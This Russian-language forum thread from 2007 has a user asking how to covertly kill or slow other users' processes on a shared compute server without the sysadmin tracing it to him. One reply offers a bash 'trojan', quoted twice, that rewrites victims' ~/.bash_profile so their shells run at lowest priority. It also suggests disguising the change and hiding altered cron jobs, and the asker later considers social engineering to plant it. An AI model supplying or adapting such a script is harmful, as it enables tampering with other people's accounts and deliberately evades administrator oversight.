Как убрать конкурентов ?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Как убрать конкурентов ? - 2007-07-12 19:15:27.806666
|
|
|
Xaleandr
Сообщений: 83
Оценки: 0
Присоединился: 2007-05-22 18:46:53.813333
|
Привет всем,
Возникла небольшая проблема:
Имеется центральный комп с кучей установленных программ(~мощный сервер, используется для счёта) , доступ по внутренней сети по ssh у всех членов группы.
Можно ли, имея доступ как юзер, убить конкурирующие процессы других юзеров, причём желательно незаметно от сисадмина ???
Заранее спасибо,
Алекс
|
|
|
|
|
RE: Как убрать конкурентов ? - 2007-07-12 19:28:08.383333
|
|
|
GNUlancer
Сообщений: 380
Оценки: 0
Присоединился: 2007-06-16 20:10:00.716666
|
:D Понравился заголовок. Легально - ниизя. Интересно, а как ты сделаешь это незаметно от сисадмина. 'Конкурент' видит, что его процесс убили, спрашивает админа WTF?, админ этого не делал и т.д..
|
|
|
|
|
RE: Как убрать конкурентов ? - 2007-07-12 19:34:14.710000
|
|
|
GNUlancer
Сообщений: 380
Оценки: 0
Присоединился: 2007-06-16 20:10:00.716666
|
Если хочешь - можно приостановить, послав сигнал STOP, а потом продолжить сигналом CONT. Но в любом случае нужны админские права/права владельца процесса или безобразная дырка в безопасности системы.
|
|
|
|
|
RE: Как убрать конкурентов ? - 2007-07-13 12:51:30.816666
|
|
|
Xaleandr
Сообщений: 83
Оценки: 0
Присоединился: 2007-05-22 18:46:53.813333
|
Привет,
1) Незаметно от сисадмина: имел ввиду чтобы не светилось в логах что это именно я (на центральном компе до фига юзеров)
2) По поводу "послать сигнал"-пробовал, пишет "доступ запрещен".
3) По поводу дыр-не могу понять что за ядро стоит. Запрос uname -a выдает 2P12SMP (???), Google никаких эксплоитов на эту тему не знает; комп-вроде бы кластер от IBM.
|
|
|
|
|
RE: Как убрать конкурентов ? - 2007-07-13 14:45:20.570000
|
|
|
rgo
Сообщений: 7170
Оценки: 281
Присоединился: 2004-09-25 05:14:25
|
можно попытаться всадить юзверям троян:#!/bin/bash
cat >~/.tmp.bash_profile <<EOF
#!/bin/bash
if [[ `nice` == 0 ]]; then
exec nice -n 19 bash -l
fi
EOF
grep -v '#!/bin/bash' ~/.bash_profile >>~/.tmp.bash_profile
mv ~/.tmp.bash_profile ~/.bash_profile никто не умирает, но у всех стоит самый сраный приоритет, а у тебя нормальный :)
возможно придётся слегка подкорректировать под конкретную систему (может там не bash используется, или значения nice другие), и я чего-то не очень помню, хватит ли для bash опции -l, чтобы он-таки прогрузил все стартап скрипты. но если надо – разберёшься. я думаю, сложнее будет всадить этот троян, чем изменить его так, чтобы он не столь в глаза бросался ;)
а! ещё кто-то может чего-то по cron'у запускать – тут уже сложнее, но… можно. в принципе, при желании, можно даже технологии стелсирования использовать, чтобы говоря crontab -l или -e, человек бы не замечал что у него задачи запускаются с пониженным приоритетом.
|
|
|
|
|
RE: Как убрать конкурентов ? - 2007-07-13 16:08:54.833333
|
|
|
GNUlancer
Сообщений: 380
Оценки: 0
Присоединился: 2007-06-16 20:10:00.716666
|
"12SMP" насколько я понимаю означает, что система работает параллельно на 12 процессорах. К серьёзной системе обычно прилагается серьёзный админ, так что я думаю не стоит его злить, а то ещё уч. запись потеряешь ;)
|
|
|
|
|
RE: Как убрать конкурентов ? - 2007-07-13 16:12:24.116666
|
|
|
GNUlancer
Сообщений: 380
Оценки: 0
Присоединился: 2007-06-16 20:10:00.716666
|
quote:
ORIGINAL: rgo
можно попытаться всадить юзверям троян:#!/bin/bash
cat >~/.tmp.bash_profile <<EOF
#!/bin/bash
if [[ `nice` == 0 ]]; then
exec nice -n 19 bash -l
fi
EOF
grep -v '#!/bin/bash' ~/.bash_profile >>~/.tmp.bash_profile
mv ~/.tmp.bash_profile ~/.bash_profile никто не умирает, но у всех стоит самый сраный приоритет, а у тебя нормальный :)
возможно придётся слегка подкорректировать под конкретную систему (может там не bash используется, или значения nice другие), и я чего-то не очень помню, хватит ли для bash опции -l, чтобы он-таки прогрузил все стартап скрипты. но если надо – разберёшься. я думаю, сложнее будет всадить этот троян, чем изменить его так, чтобы он не столь в глаза бросался ;)
а! ещё кто-то может чего-то по cron'у запускать – тут уже сложнее, но… можно. в принципе, при желании, можно даже технологии стелсирования использовать, чтобы говоря crontab -l или -e, человек бы не замечал что у него задачи запускаются с пониженным приоритетом.
Небольшой облом: раз система используется для счёта и по-видимому стоит недёшево, то вполне возможно, что у админа 24ч на одной из консолей работает top :)
|
|
|
|
|
RE: Как убрать конкурентов ? - 2007-07-13 16:30:21.600000
|
|
|
rgo
Сообщений: 7170
Оценки: 281
Присоединился: 2004-09-25 05:14:25
|
quote:
ORIGINAL: GNUlancer
Небольшой облом: раз система используется для счёта и по-видимому стоит недёшево, то вполне возможно, что у админа 24ч на одной из консолей работает top :)
и что? админ запрещает пользователям работать с пониженным приоритетом? ;)
|
|
|
|
|
RE: Как убрать конкурентов ? - 2007-07-13 16:36:43.710000
|
|
|
GNUlancer
Сообщений: 380
Оценки: 0
Присоединился: 2007-06-16 20:10:00.716666
|
quote:
ORIGINAL: rgo
и что? админ запрещает пользователям работать с пониженным приоритетом? ;)
Нет, с повышенным ;)
Его процессы будут на самом верху :D
Хотя это всего лишь предположение.
|
|
|
|
|
RE: Как убрать конкурентов ? - 2007-07-13 18:20:14.350000
|
|
|
Xaleandr
Сообщений: 83
Оценки: 0
Присоединился: 2007-05-22 18:46:53.813333
|
Спасибо за совет.
Попробовал скрипт, но вышел полный облом: админ отключил доступ к nice:
AlexS@linux7:~$ nice -n 1 test
nice: cannot set priority: Permission denied
Хотя, в top есть процессы с nice отличном от нуля, но они все бегут как "root".
|
|
|
|
|
RE: Как убрать конкурентов ? - 2007-07-13 18:23:06.350000
|
|
|
GNUlancer
Сообщений: 380
Оценки: 0
Присоединился: 2007-06-16 20:10:00.716666
|
Вот так, админ не дремлет [>:]
|
|
|
|
|
RE: Как убрать конкурентов ? - 2007-07-13 20:15:16.413333
|
|
|
rgo
Сообщений: 7170
Оценки: 281
Присоединился: 2004-09-25 05:14:25
|
quote:
ORIGINAL: Xaleandr
Спасибо за совет.
Попробовал скрипт, но вышел полный облом: админ отключил доступ к nice:
AlexS@linux7:~$ nice -n 1 test
nice: cannot set priority: Permission denied
ты маны про nice читал? скажем во фре другие значения nice используются. у тебя вообще, как ты говоришь nix неизвесной марки. я может чего-то путаю, но вроде существуют *nix'ы в которых увеличение значения nice соответствует увеличению приоритета. ты почитай маны. запрещать понижение приоритета никто в здравом уме не будет. тебе же nice, скорее всего, говорит о том, что не может повысить приоритет процесса.
|
|
|
|
|
RE: Как убрать конкурентов ? - 2007-07-13 23:41:47.856666
|
|
|
rgo
Сообщений: 7170
Оценки: 281
Присоединился: 2004-09-25 05:14:25
|
quote:
ORIGINAL: GNUlancer
quote:
ORIGINAL: rgo
и что? админ запрещает пользователям работать с пониженным приоритетом? ;)
Нет, с повышенным ;)
Его процессы будут на самом верху :D
это если он _всех_ протроянит. но если там два десятка пользователей сидят в онлайне, и половине он всадит… то вовсе не факт, что его процессы будут стабильно на экран помещаться :)
|
|
|
|
|
RE: Как убрать конкурентов ? - 2007-07-15 08:54:11.066666
|
|
|
Xaleandr
Сообщений: 83
Оценки: 0
Присоединился: 2007-05-22 18:46:53.813333
|
Привет,
quote:
ORIGINAL: rgo
ты маны про nice читал? скажем во фре другие значения nice используются. у тебя вообще, как ты говоришь nix неизвесной марки. я может чего-то путаю, но вроде существуют *nix'ы в которых увеличение значения nice соответствует увеличению приоритета. ты почитай маны. запрещать понижение приоритета никто в здравом уме не будет. тебе же nice, скорее всего, говорит о том, что не может повысить приоритет процесса.
насколько мне известно, nice он и в Африке nice: на всех системах чем меньше значение, тем выше приоритет.
Попробовал "nice -n -1 test", та же фигня (Permission denied)
|
|
|
|
|
RE: Как убрать конкурентов ? - 2007-07-15 09:02:23.786666
|
|
|
Xaleandr
Сообщений: 83
Оценки: 0
Присоединился: 2007-05-22 18:46:53.813333
|
quote:
ORIGINAL: rgo
это если он _всех_ протроянит. но если там два десятка пользователей сидят в онлайне, и половине он всадит… то вовсе не факт, что его процессы будут стабильно на экран помещаться :)
Ты прав, действительно там ~40 пользователей. Но реально используют систему (и мешают друг другу) лишь ~3-4 человека. И проблема в том что эти 3-4 человека не пальцем деланные, так что "протроянить" их с помощью соц. инженерии маловероятно.
|
|
|
|
|
|
